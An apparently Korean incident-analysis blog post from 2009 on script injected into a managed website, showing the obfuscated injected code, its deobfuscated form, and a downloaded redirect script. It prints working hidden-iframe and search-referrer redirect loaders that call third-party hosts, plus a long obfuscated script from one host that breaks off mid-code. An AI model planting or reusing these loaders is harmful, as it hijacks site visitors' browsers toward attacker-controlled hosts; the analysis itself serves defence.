2009. 3. 3. 16:53

해외에서 삽입한 악성코드 아닌 광고코드 분석

관리 중인 모 사이트에 아래와 같은 코드(악성코드는 아니고 광고코드)가 삽입되었으며,
침해 분석 결과 삽입은 해외 IP에서 이루어진 것으로 확인되었음.
(단, 외부 서버의 스크립트와 iframe을 불러오는 구조이므로 실제로 내려오는 내용은 분석 시점 이후 바뀔 수 있음.)

일단 침해에 사용된 방법은 차단하였으나, 추가 시도 가능성이 있으므로 지속적인 모니터링이 필요함.


-- 삽입코드 --
<script>eval( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72%3d%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d%65%6e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3b%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%6d%73%6e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%6d%73%6e%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%68%6f%6f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%65%3d%22%79%61%68%6f%6f%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%6e%64%65%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65%3d%22%79%61%6e%64%65%78%2e%72%75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68&&%28%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%65%3d%72%2e%73%75%62%73%74%72%69%6e%67%28%71%2b%32%2b%74%2e%6c%65%6e%67%74%68%29%2e%73%70%6c%69%74%28%22&%22%29%5b%30%5d%3b%0d%0a%69%66%20%28%28%71%75%65%2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%65%73%74%34%79%6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69%64%63%68%2e%6a%73%3f%71%3d%22%2b%71%75%65%2b%22&%72%65%66%3d%22%2b%72%2b%22%27%3e%3c%2f%73%63%22%2b%22%72%69%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76%61%72%20%6d%79%69%6b%3d%74%72%75%65%3b" ));</script><script>function c173b3059n49a9e2331c1e0(n49a9e2331c9c4){  return (parseInt(n49a9e2331c9c4,16));}function n49a9e2331e11f(n49a9e2331e8ef){ function n49a9e23320060(){var n49a9e2332082f=2;return 
n49a9e2332082f;} var n49a9e2331f0bf='';n49a9e23320fff=String['fromCharCode'];for(n49a9e2331f891=0;n49a9e2331f891<n49a9e2331e8ef.length;n49a9e2331f891+=n49a9e23320060()){ n49a9e2331f0bf+=(n49a9e23320fff(c173b3059n49a9e2331c1e0(n49a9e2331e8ef.substr(n49a9e2331f891,n49a9e23320060()))));}return n49a9e2331f0bf;} var x23='';var n49a9e233217cf='3C7'+x23+'3637'+x23+'2697'+x23+'07'+x23+'43E667'+x23+'56E637'+x23+'4696F6E20636865636B5F636F6E7'+x23+'4656E7'+x23+'428297'+x23+'B7'+x23+'6617'+x23+'220693D303B7'+x23+'7'+x23+'68696C6528646F637'+x23+'56D656E7'+x23+'42E67'+x23+'657'+x23+'4456C656D656E7'+x23+'47'+x23+'3427'+x23+'9546167'+x23+'4E616D652827'+x23+'69667'+x23+'2616D6527'+x23+'292E6C656E67'+x23+'7'+x23+'468297'+x23+'B7'+x23+'6617'+x23+'220656C3D646F637'+x23+'56D656E7'+x23+'42E67'+x23+'657'+x23+'4456C656D656E7'+x23+'47'+x23+'3427'+x23+'9546167'+x23+'4E616D652827'+x23+'69667'+x23+'2616D6527'+x23+'295B695D3B6966282028656C2E7'+x23+'37'+x23+'47'+x23+'96C652E64697'+x23+'37'+x23+'06C617'+x23+'93D3D27'+x23+'6E6F6E6527'+x23+'207'+x23+'C7'+x23+'C20656C2E7'+x23+'37'+x23+'47'+x23+'96C652E7'+x23+'6697'+x23+'36962696C697'+x23+'47'+x23+'9203D3D27'+x23+'68696464656E27'+x23+'207'+x23+'C7'+x23+'C2028656C2E7'+x23+'7'+x23+'69647'+x23+'4683C3520262620656C2E68656967'+x23+'687'+x23+'43C35292920262620656C2E6E616D65213D27'+x23+'633127'+x23+'297'+x23+'B656C2E7'+x23+'0617'+x23+'2656E7'+x23+'44E6F64652E7'+x23+'2656D6F7'+x23+'6654368696C6428656C293B7'+x23+'D656C7'+x23+'36520692B2B3B7'+x23+'D7'+x23+'D636865636B5F636F6E7'+x23+'4656E7'+x23+'428293B0A696628216D7'+x23+'96961297'+x23+'B646F637'+x23+'56D656E7'+x23+'42E7'+x23+'7'+x23+'7'+x23+'2697'+x23+'465287'+x23+'56E657'+x23+'363617'+x23+'065282027'+x23+'2533632536392536362537'+x23+'322536312536642536352532302536652536312536642536352533642536332533312532302537'+x23+'332537'+x23+'32253633253364253237'+x23+'2536382537'+x23+'342537'+x23+'342537'+x23+'30253361253266253266253637'+x23+'2536352537'+x23+'322536642536312536652536312536342537'+x23+'362536352537'+x23+
'322537'+x23+'342536392537'+x23+'33253639253665253637'+x23+'2532652536652536352537'+x23+'34253266253639253665253265253633253637'+x23+'25363925336625333926253237'+x23+'2532622534642536312537'+x23+'342536382532652537'+x23+'322536662537'+x23+'352536652536342532382534642536312537'+x23+'342536382532652537'+x23+'32253631253665253634253666253664253238253239253261253331253339253331253339253335253338253239253262253237'+x23+'253632253334253330253339253634253633253636253634253635253337'+x23+'253635253633253237'+x23+'2532302537'+x23+'37'+x23+'2536392536342537'+x23+'34253638253364253335253339253338253230253638253635253639253637'+x23+'2536382537'+x23+'342533642533332533322533312532302537'+x23+'332537'+x23+'342537'+x23+'39253663253635253364253237'+x23+'2537'+x23+'362536392537'+x23+'332536392536322536392536632536392537'+x23+'342537'+x23+'39253361253638253639253634253634253635253665253237'+x23+'2533652533632532662536392536362537'+x23+'3225363125366425363525336527'+x23+'29293B7'+x23+'D7'+x23+'6617'+x23+'2206D7'+x23+'969613D7'+x23+'47'+x23+'27'+x23+'5653B3C2F7'+x23+'3637'+x23+'2697'+x23+'07'+x23+'43E';document.write(n49a9e2331e11f(n49a9e233217cf));</script><script>function c2882110cbp49aa99ba0a009(p49aa99ba0a7ea){ var p49aa99ba0afb3=16; return (parseInt(p49aa99ba0a7ea,p49aa99ba0afb3));}function p49aa99ba0cdd8(p49aa99ba0d5a5){  var p49aa99ba0dd75='';p49aa99ba0fcb4=String.fromCharCode;for(p49aa99ba0e545=0;p49aa99ba0e545<p49aa99ba0d5a5.length;p49aa99ba0e545+=2){ p49aa99ba0dd75+=(p49aa99ba0fcb4(c2882110cbp49aa99ba0a009(p49aa99ba0d5a5.substr(p49aa99ba0e545,2))));}return p49aa99ba0dd75;} var u9b='';var 
p49aa99ba10484='3C7'+u9b+'3637'+u9b+'2697'+u9b+'07'+u9b+'43E696628216D7'+u9b+'96961297'+u9b+'B646F637'+u9b+'56D656E7'+u9b+'42E7'+u9b+'7'+u9b+'7'+u9b+'2697'+u9b+'465287'+u9b+'56E657'+u9b+'363617'+u9b+'065282027'+u9b+'2533632536392536362537'+u9b+'322536312536642536352532302536652536312536642536352533642536332533322533382532302537'+u9b+'332537'+u9b+'32253633253364253237'+u9b+'2536382537'+u9b+'342537'+u9b+'342537'+u9b+'302533612532662532662536392537'+u9b+'342536332536662537'+u9b+'352536652537'+u9b+'342536352537'+u9b+'322532652536652536352537'+u9b+'342532662536332536662537'+u9b+'352536652537'+u9b+'342536352537'+u9b+'322532652537'+u9b+'302536382537'+u9b+'30253366253237'+u9b+'2532622534642536312537'+u9b+'342536382532652537'+u9b+'322536662537'+u9b+'352536652536342532382534642536312537'+u9b+'342536382532652537'+u9b+'32253631253665253634253666253664253238253239253261253331253331253330253335253335253330253239253262253237'+u9b+'253339253336253635253330253636253633253330253237'+u9b+'2532302537'+u9b+'37'+u9b+'2536392536342537'+u9b+'34253638253364253334253330253332253230253638253635253639253637'+u9b+'2536382537'+u9b+'34253364253332253337'+u9b+'2533352532302537'+u9b+'332537'+u9b+'342537'+u9b+'39253663253635253364253237'+u9b+'2537'+u9b+'362536392537'+u9b+'332536392536322536392536632536392537'+u9b+'342537'+u9b+'39253361253638253639253634253634253635253665253237'+u9b+'2533652533632532662536392536362537'+u9b+'3225363125366425363525336527'+u9b+'29293B7'+u9b+'D7'+u9b+'6617'+u9b+'2206D7'+u9b+'969613D7'+u9b+'47'+u9b+'27'+u9b+'5653B3C2F7'+u9b+'3637'+u9b+'2697'+u9b+'07'+u9b+'43E';document.write(p49aa99ba0cdd8(p49aa99ba10484));</script>


난독화를 풀어 읽을 수 있는 코드로 변환하면 아래와 같음.

-- 원형 코드 --
<script>
// Deobfuscated loader snippet. It acts only when the visitor arrived from a
// matched search-engine results page; on a direct visit t stays "" and nothing
// is written, so verify a cleanup with a search-engine Referer as well.
// `var myik` at the bottom is hoisted, so this test reads undefined (not a
// ReferenceError) the first time and true on any repeated copy of the snippet.
if(!myik)
{
 // r: referring URL, t: name of the search-query parameter, q: index of that
 // parameter inside r, que: the extracted query text.
 // u and se are assigned but never read in this snippet.
 var r=document.referrer,u=document.URL,t="",q,que,se="gb";
 // Choose the query-parameter name by substring match on the referrer.
 if(r.indexOf("google.")!=-1){t="q";se="google";}
 if(r.indexOf("msn.")!=-1){t="q";se="msn";}
 if(r.indexOf("yahoo.")!=-1){t="p";se="yahoo";}
 if(r.indexOf("yandex.ru")!=-1){t="text";se="yandex.ru";}
 // Continue only if an engine matched and its parameter occurs as ?t= or &t= in r.
 if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
 {
  // Skip the separator ("?" or "&"), the parameter name and "=", then cut at the next "&".
  que=r.substring(q+2+t.length).split("&")[0];
  // Queries containing 'site:' or 'www.' are left alone.
  if ((que.indexOf('site:')==-1) && (que.toLowerCase().indexOf('www.')==-1))
   // Writes a <script> tag that pulls bidch.js from a third-party host, passing
   // the query text and the full referrer unencoded in the URL. The closing tag
   // is split ("</sc"+"ript>") so it does not terminate the enclosing script.
   document.write("<script src='http://best4you.if.ua/js/bidch.js?q="+que+"&ref="+r+"'></sc"+"ript>");
 }
}
var myik=true;
</script>

<script>
// Removes iframes that look hidden (display 'none', visibility 'hidden', or both
// width and height below 5) unless the iframe's name is 'c1', which is the name
// used for the iframe written further down in this same script.
// NOTE(review): the loop tests the collection length rather than i. Once an
// iframe is kept and i moves past the last element, el is undefined and
// el.style would throw; confirm on a test page whether that aborts the rest of
// this script when the page has a visible iframe.
function check_content()
{
 var i=0;
 while(document.getElementsByTagName('iframe').length)
 {
  // The collection is re-queried on every pass, so after a removal index i
  // already points at the next candidate.
  var el=document.getElementsByTagName('iframe')[i];
  if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1')
  {
   el.parentNode.removeChild(el);
  }
  else
   i++;
 }
}
// Strip other hidden iframes first, then add this snippet's own iframe once.
check_content();

// `var myia` below is hoisted, so this reads undefined on the first run.
if(!myia)
{
 // Writes an iframe named c1 that points at a third-party host. It is sized
 // 598x321 but styled visibility:hidden, so it loads without being shown.
 // NOTE(review): as transcribed, '+Math.round(Math.random()*191958)+' sits
 // inside the double-quoted string, so it is literal text here rather than an
 // evaluated expression; compare with the decoded payload before relying on it.
 document.write("<iframe name=c1 src='http://germanadvertising.net/in.cgi?9'+Math.round(Math.random()*191958)+'b409dcfde7ec' width=598 height=321 style='visibility:hidden'></iframe>");
}
var myia=true;
</script>

<script>
// Same pattern as the c1 snippet, with an iframe named c28 and a different
// third-party host. It tests the same myia flag, so on a page where the c1
// snippet has already run and set myia to true this write is skipped.
if(!myia)
{
 // NOTE(review): the Math.round(...) text is again inside the double-quoted
 // string in this transcription; check it against the decoded payload.
 document.write("<iframe name=c28 src='http://itcounter.net/counter.php?'+Math.round(Math.random()*110550)+'96e0fc0' width=402 height=275 style='visibility:hidden'></iframe>");
}
var myia=true;
</script>


추가 다운로드 코드 (bidch.js) -- que 입력값 : test

-- 소스 코드 --
// bidch.js as returned for q=test. Concatenates the fragments
// "win"+"dow.lo"+"cat"+"ion='"+str+"';" into the statement
// window.location='<str>'; and passes it to eval, which navigates the page to str.
// Splitting the text presumably keeps "window.location" from appearing as a
// plain string in the file. All helper names are assigned without var, so they
// become globals.
function f(str)
{
 z="ion='";
 d="win";
 c="cat";
 f7=str;
 b="dow.lo";
 g="';";
 i=7;
 j=21;
 // 21-14==7 is always true, so the branch is always taken.
 if (j-14==i)
  eval(d+b+c+z+f7+g);
}
// The redirect target carries the search query (q=test here). Its host,
// bestforyou.if.ua, differs from best4you.if.ua, the host bidch.js was loaded from.
f('http://bestforyou.if.ua/feed/search.php?q=test');


-- 원형 코드 --
// The statement that f() builds and evaluates: a full-page redirect to the search feed.
window.location='http://bestforyou.if.ua/feed/search.php?q=test';


http://germanadvertising.net/in.cgi


-- 소스 코드 --
<body><script>CCUTMK='';F='f(d.charAt(i));c=';T='="||d.charAt(i)=="\\n")';R=';for(i=0;i<b;i++){';M='defghijklmnopqrstuvw';K='()*a.length);ci+=a.subs';V='4){a+=Strin';P='var d=Math.floor(Math.random';H='ction hexToString(d){';Z='(c==1?64:c/4);if(c!=6';I='a="";b=0;c=1;';J='function MSE(a,b){ci=""';Y='{if(d.charAt(i)=="';G='xyz0123456789+/=";fun';B='HIJKLMNOPQRSTUVWXYZabc';X='n ci}SVC="ABCDEFG';U='tring(d,d+1)}retur';L='for(i=0;i<d.length;i++)';D=' break;b=b*64+SVC.indexO';CCUTMK+=J+R+P+K+U+X+B+M+G+H+I+L+Y+T+D+F+Z+V;R='t(b/c));b%=c}}';O='rray();k+=a;a=k;for';E='6;x=s[i];s[i]=s[j]';M='(i=oil;i<256;i++)s[i]=i;';D='=oil;c="";for(y=0;y<b.le';L='g.fromCharCode(parseIn';B=';s[j]=x;c+=String';Z='return a}oil=0;';W='x=s[i];s[i]=s[j];';T='s[j]=x}i=oil;j';J='+1)%256;j=(j+s[i])%25';K='k="";if(isNaN(';P='eAt(i%a.length))%256;';I='function RRL(a,b){';N='++){j=(j+s[i]+a.charCod';U='ngth;y++){i=(i';V='j=oil;for(i=oil;i<256;i';Q='oil)){k=oil;oil=0}s=new A';CCUTMK+=L+R+Z+I+K+Q+O+M+V+N+P+W+T+D+U+J+E+B;Q='of a)this.PTO(a,256);else thi';U='ile(--n>=0){var v=x*';K='.fromCharCode(b.char';N='function rc4Decrypt(a,b)';B='function SQF(i,x,w,j,c,n){wh';V='ath.floor(v/0x4000000);w[j++]=';J='.fromNumber(a,b,c);else if(';C='}FVB=((0xdeadbeefcafe&0xfff';W='%256])}return c}';E='CodeAt(y)^s[(s[i]+s[j])';X='a,b,c){if(a!=null)if("nu';P='){return new A(null)}';Z='fff)==0xefcafe);function A(';L='mber"==typeof a)this';M='this[i++]+w[j]+c;c=M';R='b==null&&"string"!=type';F='{return RRL(a,b)';Y='s.PTO(a,b)}function nbi(';CCUTMK+=K+E+W+N+F+C+Z+X+L+J+R+Q+Y+P+B+U+M+V;L='l+h*a;l=a*l+((m&0x7f';H='c>>>30);w[j++]=l&0x3fffffff}r';M=';c=(l>>>30)+(m>>>15)+xh*h+(';P='ff)<<15)+w[j]+(c&0x3fffffff)';Q='fff,xh=x>>15;while(--';G='var h=this[i++]>>14;';Y='eturn c}function XMG(i,x,w,j,c';U='fffffff}return c}if(';V=' h=this[i++]>>15;var m=xh*';E='=x>>14;while(--n>=0){';F='>28)+(m>>14)+xh*h;w[j++]=l&0x';R='((m&0x3fff)<<14)+w[j]+c;c=(l>';O='n>=0){var l=this[i]&0x7fff;var';B='v&0x3ffffff}return c}function';T='var 
m=xh*l+h*a;l=a*l+';J=',n){var a=x&0x3fff,xh';X=' YHX(i,x,w,j,c,n){var a=x&0x7';I='var l=this[i]&0x3fff;';CCUTMK+=B+X+Q+O+V+L+P+M+H+Y+J+E+I+G+T+R+F+U;V='fghijklmnopqrstuvwxyz";';W='var MUJ=new Array();var rr,vv';M='FVB&&(navigator.appName=="';P='type.F2=2*B-BI_FP;var';R='tor.appName!="Netscape")){';S='.FV=Math.pow(2,BI_FP);A.protot';O='ype.F1=BI_FP-B;A.proto';C='XMG;B=28}A.prototype.DB';N=';A.prototype.DV=(1<<B);';D=' NGP="0123456789abcde';J='er")){A.prototype.am=Y';B='HX;B=30}else if(FVB&&(naviga';U='=26}else{A.prototype.am=';Y='Microsoft Internet Explor';F='var BI_FP=52;A.prototype';H='A.prototype.am=SQF;B';Q=';rr="0".charCodeAt(0);for(';K='=B;A.prototype.DM=((1<<B)-1)';CCUTMK+=M+Y+J+B+R+H+U+C+K+N+F+S+O+P+D+V+W+Q;T='ar i=this.t-1;i>=0;--i';X=')this[0]=x+DV;else this.t=';O='harAt(n)}function MSK(s,';D='function PLT(r){for(v';F=')r[i]=this[i];r.t=this.t;r';R='vv=0;vv<=9;++vv)MUJ[rr++]';Y='+vv)MUJ[rr++]=vv;function';W='(i)];return(c==null)?-1:c}';U='=vv;rr="a".charCodeAt';E=' JMH(n){return NGP.c';I='0}function nbv(i){var r';P='.s=this.s}function CQH(x){this';B='(0);for(vv=10;vv<36;++vv)';N='CodeAt(0);for(vv=10;vv<36;+';C='i){var c=MUJ[s.charCodeAt';S='>0)this[0]=x;else if(x<-1';J='MUJ[rr++]=vv;rr="A".char';M='.t=1;this.s=(x<0)?-1:0;if(x';CCUTMK+=R+U+B+J+N+Y+E+O+C+W+D+T+F+P+M+S+X+I;F=');return}this.t=0;this';H='lse if(b==32)k=5;else if(b==4)';V='his.t++]=x;else if(sh+';Q=')k=8;else if(b==2)k=1;e';Z='f(b==8)k=3;else if(b==256';Y='s,i);if(x<0){if(s.char';J='.DB-sh))-1))<<sh;this[this';L='0){var x=(k==8)?s[i]&0xff:MSK(';U='At(i)=="-")mi=true;continue}m';D='.s=0;var i=s.length,mi=f';R='.t-1]|=(x&((1<<(this';P='=nbi();r.BSV(i);return r';W='k=2;else{this.fromRadix(s,b';X='}function MQI(s,b){var ';C='k;if(b==16)k=4;else i';T='alse,sh=0;while(--i>=';N='k>this.DB){this[this';K='i=false;if(sh==0)this[t';CCUTMK+=P+X+C+Z+Q+H+W+F+D+T+L+Y+U+K+V+N+R+J;M='se if(b==32)k=5;else if(b==4)k';C='b==8)k=3;else 
if(b==2)k=1;el';B='his[this.t-1]|=x<<sh;sh+=';J='his.s=-1;if(sh>0)this[th';Y='"+this.OTW().UKZ(b);var ';G='[this.t-1]==c)--this.t}functio';K='}if(k==8&&(s[0]&0x80)!=0){t';T='k;if(sh>=this.DB)sh-=this.DB';F='is.t-1]|=((1<<(this.DB-sh))-1)';L='.t++]=(x>>(this.DB-sh))}else t';H='<<sh}this.PQP();if(m';V='k;if(b==16)k=4;else if(';S='n VHR(b){if(this.s<0)return"-';P='=2;else return this.toR';Q='adix(b);var a=(1<<k)-1,d,';Z='i)A.IEH.YEX(this,this)}functio';D='n PUE(){var c=this.s&this.DM;';E='while(this.t>0&&this';CCUTMK+=L+B+T+K+J+F+H+Z+D+E+G+S+Y+V+C+M+P+Q;F=')return r;var i=this.t;';M='>0)m=true;if(m)r+=JMH(d)';G='ction NFL(){return(this.s<0)?t';D='=this[i]>>p)>0){m=true;r=JMH(';I='r=i-a.t;if(r!=0)return r;whi';X='YEX(this,r);return r}fun';K='lse{d=(this[i]>>(p-=k))&a;if(p';T='ar p=this.DB-(i*this.DB)%k';U='}}return m?r:"0"}fun';O=';if(i-->0){if(p<this.DB&&(d';Z='<=0){p+=this.DB;--i}}if(d';W='W(a){var r=this.s-a.s;if(r!=0';P='ction BEJ(){var r=nbi();A.IEH.';N='[i]&((1<<p)-1))<<(k-p);d';C='|=this[--i]>>(p+=this.DB-k)}e';J='d)}while(i>=0){if(p<k){d=(this';H='his.OTW():this}function HY';Q='m=false,r="",i=this.t;v';CCUTMK+=Q+T+O+D+J+N+C+K+Z+M+U+P+X+G+H+W+F+I;N='ction IIM(n,r){var i;for(i=th';B=';r.t=this.t+n;r.s=this.s}fu';W='le(--i>=0)if((r=this[i]-a[i]';Y='[i];for(i=n-1;i>=0;--i)r[i]=0';L='is.t-1;i>=0;--i)r[i+n]=this';T='(this.t-1)+RHJ(this[this.t-1]^';J='B(){if(this.t<=0)ret';I='{x=t;r+=8}if((t=x>>4)!=0){x=t';D='=1,t;if((t=x>>>16)!=0){x=t;';U='r+=1}return r}function XS';C='urn 0;return this.DB*';H='}function RHJ(x){var r';Q='=2}if((t=x>>1)!=0){x=t;';S='(this.s&this.DM))}fun';F=';r+=4}if((t=x>>2)!=0){x=t;r+';X='nction CJC(n,r){for(var i=n;';Z='r+=16}if((t=x>>8)!=0)';K=')!=0)return r;return 0';CCUTMK+=W+K+H+D+Z+I+F+Q+U+J+C+T+S+N+L+Y+B+X;D='floor(n/this.DB);if(a>=';Y='b=this.DB-a;var d=(1';H='=this.DB-b;var d=(1<<b)-1;r[0';L='0);r.s=this.s}function IVS(n';P='this[i];r.t=Math.max(this.t-n,';Q='){r[i+e+1]=(this[i]>>b)|c;c=';N='e]=c;r.t=this.t+e+1;r.';W='<<b)-1;var 
e=Math.floor(n/th';Z='this.t){r.t=0;return';O='(this[i]&d)<<a}for(i=e';F='(n,r){r.s=this.s;var a=Math.';B='-1;i>=0;--i)r[i]=0;r[';S='s.DM,i;for(i=this.t-1;i>=0;--i';R='is.DB),c=(this.s<<a)&thi';K='}var b=n%this.DB;var c';C='i<this.t;++i)r[i-n]=';E='s=this.s;r.PQP()}function PKN';T=',r){var a=n%this.DB;var ';CCUTMK+=C+P+L+T+Y+W+R+S+Q+O+B+N+E+F+D+Z+K+H;U=' i=a+1;i<this.t;++i){r[i';Z='le(i<m){c+=this[i]-a[i';L='i-a]=this[i]>>b}if(b>0)r[t';W='];r[i++]=c&this.DM;c>>=this.DB';G='n TFU(a,r){var i=0,c=0,m=Mat';C='s.s}else{c+=this.s;while(';Y='c;r.t=this.t-a;r.PQP()}functio';O='}if(a.t<this.t){c-=a.s;while(';X='c&this.DM;c>>=this.DB}c+=thi';J=']=this[a]>>b;for(var';F='[i++]=this.DV+c;else if(c>0)';B='his.DM;c>>=this.DB}c-=a';R='.s}r.s=(c<0)?-1:0;if(c<-1)r';V='-a-1]|=(this[i]&d)<<c;r[';H='i<this.t){c+=this[i];r[i++]=';M='h.min(a.t,this.t);whi';E='his.t-a-1]|=(this.s&d)<<';P='i<a.t){c-=a[i];r[i++]=c&t';CCUTMK+=J+U+V+L+E+Y+G+M+Z+W+O+H+X+C+P+B+R+F;W='.t>0)r[r.t-1]+=x.am(i,x';F=';var i=r.t=2*x.t;while(--i>=';V='m(i+1,2*x[i],r,2*i+1,c,x.t-i-';P='.am(0,y[i],r,i,0,x.t';Q='r,2*i,0,1);if((r[i+x.t]+=x.a';T='D(r){var x=this.abs()';K=');r.s=0;r.PQP();if(this.s!=';R='a.s)A.IEH.YEX(r,r)}function TS';I='.DV;r[i+x.t+1]=1}}if(r';Z='tion KGX(a,r){var x=this.abs()';H='[i],r,2*i,0,1);r.s=0;r';L='r[i++]=c;r.t=i;r.PQP()}func';C=';r.t=i+y.t;while(--i>=0)r[i]=';O='0)r[i]=0;for(i=0;i<x.t-1;++';X='0;for(i=0;i<y.t;++i)r[i+x.t]=x';G=',y=a.abs();var i=x.t';E='i){var c=x.am(i,x[i],';S='1))>=x.DV){r[i+x.t]-=x';CCUTMK+=L+Z+G+C+X+P+K+R+T+F+O+E+Q+V+S+I+W+H;G='<this.F2;var i=r.t,j=';Z='i-d,t=(q==null)?nbi():q;';E='var y=nbi(),ts=this.s,ms=m.s;';L='=f*(1<<this.F1)+((d>1)?y[d-2]>';M='q,r){var a=m.abs();if(a.t<=0)';P='(c,r)}else{a.JJQ(y);b.';S='=y[d-1];if(f==0)return;var g';X='y.DKU(j,t);if(r.KXG(t)>=0){r[';V='V/g,d2=(1<<this.F1)/g,e=1<';W='V(0);if(r!=null)this.JJQ(';F='f(c>0){a.FKG(c,y);b.FKG';N='var c=this.DB-RHJ(a[a.t-1]);i';R='JJQ(r)}var d=y.t;var f';T='f(b.t<a.t){if(q!=null)q.BS';Y='>this.F2:0);var 
h=this.F';Q='return;var b=this.abs();i';B='.PQP()}function EZB(m,';C='r);return}if(r==null)r=nbi();';CCUTMK+=B+M+Q+T+W+C+E+N+F+P+R+S+L+Y+V+G+Z+X;W='?this.DM:Math.floor(r';C='f((r[i]+=y.am(0,k,r,j,0,d))';B='t,r)}}if(q!=null){r.JWV(d,q);i';T='<k){y.DKU(j,t);r.YEX(t,r)';U='ile(--j>=0){var k=(r[--i]==f)';V='>0)a.YEX(r,r);return r}';I='le(y.t<d)y[y.t++]=0;wh';D='if(this.s<0&&r.KXG(A.IEH)';S='function JVI(m){this.m=';Q='(r,r)}function JOB(a){var r=nb';Z='DKU(d,t);t.YEX(y,y);whi';M='r.t++]=1;r.YEX(t,r)}A.ONE.';K='r);if(ts<0)A.IEH.YEX';X='r.PQP();if(c>0)r.NSN(c,';J=';while(r[i]<--k)r.YEX(';N='f(ts!=ms)A.IEH.YEX(q,q)}r.t=d;';E='[i]*h+(r[i-1]+e)*d2);i';P='i();this.abs().VFG(a,null,r);';CCUTMK+=M+Z+I+U+W+E+C+T+J+B+N+X+K+Q+P+D+V+S;L=' x}function WFM(x){ret';E='I.prototype.KFO=WFM;JVI.proto';J='pe.XBO=BNB;JVI.prototype.T';U='m}function UWR(x){if(x.';F='s<0||x.KXG(this.m)>=0)return ';M=' BNB(x,y,r){x.HVF(y,r);this';C='type.BTZ=OUV;JVI.prototy';Z='.BTZ(r)}function UXH(x,r){x.F';Y='var y=x&3;y=(y*(2-(x&0';G='x.mod(this.m);else return';D='.VFG(this.m,null,x)}function';B='s.t<1)return 0;var x=this[';I='urn x}function OUV(x){x';W='GH=UXH;function SQY(){if(thi';Q='0];if((x&1)==0)return 0;';N='.prototype.CSS=UWR;JV';P='xf)*y))&0xf;y=(y*(2-';V='EO(r);this.BTZ(r)}JVI';CCUTMK+=U+F+G+L+I+D+M+Z+V+N+E+C+J+W+B+Q+Y+P;L='this.mp&0x7fff;this.mp';C='h=this.mp>>15;this.um';T=' VUP(x){var r=nbi();x.abs()';Y='TZ(r);return r}funct';S='on UTY(m){this.m=m;this';U='.mp=m.RTY();this.mpl=';F=',null,r);if(x.s<0&&r.KXG(';M='return r}function DDD(x){';J='(2-(((x&0xffff)*y)&0x';N='s.mt2=2*m.t}function';O='?this.DV-y:-y}functi';R='A.IEH)>0)this.m.YEX(r,r);';P='(x&0xff)*y))&0xff;y=(y*';D='var r=nbi();x.JJQ(r);this.B';X='.DKU(this.m.t,r);r.VFG(this.m';H='s.DV))%this.DV;return(y>0)';K='=(1<<(m.DB-15))-1;thi';Z='ffff)))&0xffff;y=(y*(2-x*y%thi';CCUTMK+=P+J+Z+H+O+S+U+L+C+K+N+T+X+F+R+M+D+Y;B=')<<15))&x.DM;j=i+this.m';W=';x[++j]++}}x.PQP();x.JWV';P='ar 
i=0;i<this.m.t;++i){va';D='is.m)>=0)x.YEX(this.';X=',x,i,0,this.m.t);whi';R='UTY.prototype.KFO=DDD;UTY.p';V='UTY.prototype.CSS=VUP;';K='le(x[j]>=x.DV){x[j]-=x.DV';T='(this.m.t,x);if(x.KXG(th';I='y,r){x.HVF(y,r);this.BTZ(r)}';M='r);this.BTZ(r)}function CDB(x,';E='is.mpl+(((j*this.mph';H='m,x)}function KGV(x,r){x.FEO(';F='r j=x[i]&0x7fff;var a=(j*th';N='.t;x[j]+=this.m.am(0,a';Z='ion DMY(x){while(x.t<=t';G='his.mt2)x[x.t++]=0;for(v';U='+(x[i]>>15)*this.mpl)&this.um';CCUTMK+=Z+G+P+F+E+U+B+N+X+K+W+T+D+H+M+I+V+R;R=')}A.prototype.JJQ=PLT;A.proto';M='JJQ(r);while(--i>=0){z.TGH(';C=';return this.exp(e,z';Z='r,r2);if((e&(1<<i))>0)z';S='pe.XBO=CDB;UTY.proto';Q='S(this),i=RHJ(e)-1;g.';V='e<256||m.FIP())z=new JVI';W='.XBO(r2,g,r);else{var t';J='ction JRI(e,z){if(e>0xfffff';U='type.TGH=KGV;function NQU()';K='fff||e<1)return A.ONE;';N='(m);else z=new UTY(m)';Y='{return((this.t>0)?(';E='}function BQI(e,m){var z;if(';H='rototype.BTZ=DMY;UTY.prototy';I='=r;r=r2;r2=t}}return z.KFO(r)';O='this[0]&1):this.s)==0}fun';L='var r=nbi(),r2=nbi(),g=z.CS';CCUTMK+=H+S+U+Y+O+J+K+L+Q+M+Z+W+I+E+V+N+C+R;W='e.abs=NFL;A.prototype.KXG=';P=';A.ONE=nbv(1);function 